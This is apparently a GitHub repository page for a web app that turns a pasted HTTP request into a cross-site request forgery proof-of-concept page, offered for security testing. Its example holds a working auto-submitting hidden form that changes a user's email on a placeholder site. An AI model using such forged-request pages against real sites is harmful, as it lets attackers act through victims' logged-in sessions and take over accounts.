Skip to content

Pyr0sec/CSRF-PoC-generator

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

18 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CSRF-PoC-generator

https://csrf-poc-generator.vercel.app/

With this user-friendly tool, you can easily generate proof-of-concept (PoC) scripts for CSRF attacks by entering your HTTP requests and verify the effectiveness of your existing security measures. The PoC scripts generated by CSRF-PoC-Generator are customizable, allowing you to simulate real-world scenarios and fine-tune your security measures accordingly.

Your feedbacks are appreciated.

Example Request

POST /email/change HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
Cookie: session=yvthwsztyeQkAPzeQ5gHgTvlyxHfsAfE

email=wiener@normal-user.com

PoC generated

<html>
  <body>
    <form action="https://vulnerable-website.com/email/change" method="POST">
      <input type="hidden" name="email" value="wiener@normal-user.com" />
    </form>
    <script>
      document.forms[0].submit()
    </script>
  </body>
</html>

About

CSRF Proof of Concept script generator webapp πŸ’»πŸ”’

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published